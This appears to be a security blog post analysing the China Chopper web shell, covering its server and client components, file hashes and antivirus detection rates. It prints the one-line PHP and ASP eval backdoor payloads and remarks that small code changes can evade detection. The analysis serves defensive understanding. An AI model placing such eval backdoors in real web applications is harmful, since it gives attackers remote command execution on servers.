In part 1 of the web shell series, we provided an overview of web shells and how they are manifested in an enterprise network. In this part, we go deeper into exploring a famous web shell.

Web shells in the wild:

There are several web shells in the wild like China Chopper, Cknife etc. According to a report from NTT, China Chopper is the second most detected malware and the top web shell in enterprise. It has been active since around 10 years. The prevalence might be credited to its minimal footprint on the server.

Breaking the shell:

The China Chopper web shell is a simple program consisting of two components, the server and the client. The server component is a simple server-side payload that is placed on the server post-exploitation. The client component is a comprehensive binary that allows a threat actor to connect back to the server to perform command-and-control (CnC) activites.

Server Component:

This is the essential component that is placed on an exploited server and serves as a backdoor. The payload is a simple file dropped on the compromised server. The client communicates with this file. The payload itself can be in several languages such as ASP, PHP, JSP etc., depending on the web server.

Sample payload placed on an IIS web server might look like this:

<%@ Page Language="Jscript"%><%eval(Request.Item[“password”],"unsafe");%>

Sample payload placed on an Apache web server might look like this:

< ?php @eval($_POST['password']);? >

As can be observed, the footprint is minimal and can easily bypass detection on the wire and even in the web server logs.

Client Component:

Name(s)  caidao.exe, cd.exe, chopper.exe, caidao.bin 
MD5  5001ef50c7e869253a7c152a638eab8a 
SHA-256  be24561427d754c0c150272cab5017d5a2da64d41bec74416b8ae363fb07fd77 
File Type  PE (Win32 executable) 
Parent file(s)  caidao.zip, caidao.7z 
File Size  220672 bytes (215.50 KB) 

The client component is a PE binary, used to access the web shell backdoor.

The parent zip contains several files for customization and configuration.

China Chopper provides a GUI with several features and capabilities.

The threat actor could implant the web shell and connect with the shell:

There are several capabilities for the client since it now has remote access to the web server/application. One of the capabilities is virtual terminal (command shell) access to the server.

Detections:

The China Chopper client component is the main component as shown before. The web shell itself has been in existence since a long time (2011), with several variants. It is detected fairly well by most of the AVs:

However, this component does not show up on the server. The server-side component is the script file, which has minimal footprint. Since it is a server-side script, it does not generate any client code:

The detection rate for the server-side script itself is low, 8/57. This could easily change to a 0, since various scripting languages allow for the flexibility to change the code without changing the semantics, thus changing the hash values and the payload itself.